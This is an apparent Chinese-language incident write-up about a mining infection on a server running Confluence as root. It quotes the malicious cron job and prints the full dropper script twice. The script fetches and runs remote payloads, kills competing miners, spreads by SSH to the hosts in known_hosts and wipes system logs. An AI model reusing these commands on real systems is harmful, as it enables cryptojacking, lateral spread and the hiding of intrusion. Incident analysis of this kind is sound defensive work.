问题现象
使用卡顿,登录机器后发现使用率高,出现异常进程,怀疑是挖矿病毒
排查分析
主要原因: confluence jar文件导致的漏洞
https://www.chainnews.com/articles/798890197372.htm
次要原因: root启动confluence,导致权限较高,病毒程序能够做更多的配置。而普通用户下,无权限增加各种启动项。可见使用普通用户权限启动对应的服务是非常重要的
发现的定时任务:
*/10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
可以看到 定时去获取某个脚本,然后执行,我们可以下载来看看脚本具体的内容,脚本内容:
[root@localhost redhat]# curl -fsSL https://pastebin.com/raw/xmxHzu5P
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
apt-get install curl -y||yum install curl -y||apk add curl -y
apt-get install cron -y||yum install crontabs -y||apk add cron -y
systemctl start crond
systemctl start cron
systemctl start crontab
service start crond
service start cron
service start crontab
if [ ! -f "/tmp/.X11unix" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods
elif [ ${ARCH}x = "i686x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
else
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
fi
/tmp/kerberods
elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods
elif [ ${ARCH}x = "i686x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
else
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/1554470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
fi
/tmp/kerberods
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh >/dev/null 2>&1 &' & done
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
[root@localhost redhat]# more 123.sh
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
apt-get install curl -y||yum install curl -y||apk add curl -y
apt-get install cron -y||yum install crontabs -y||apk add cron -y
systemctl start crond
systemctl start cron
systemctl start crontab
service start crond
service start cron
service start crontab
if [ ! -f "/tmp/.X11unix" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/15
54470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods
elif [ ${ARCH}x = "i686x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/15
54470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
else
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/15
54470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
fi
/tmp/kerberods
elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470365x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/15
54470365x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/t2D_WbHk -o /tmp/kerberods||wget --timeout=30 --tries=3 -q htt
ps://pixeldrain.com/api/file/t2D_WbHk -O /tmp/kerberods) && chmod +x /tmp/kerberods
elif [ ${ARCH}x = "i686x" ]; then
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/15
54470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
else
(curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://sowcar.com/t6/696/1554470400x2890174166.jpg -o /tmp/kerberods||wget --timeout=30 --tries=3 -q http://sowcar.com/t6/696/15
54470400x2890174166.jpg -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/wl_bHMB1 -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/wl_bHMB1 -O /tmp/kerberods) && chmod +x /tmp/kerberods
fi
/tmp/kerberods
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/Hd
jSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh >/dev/null 2>&1 &' & done
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
评论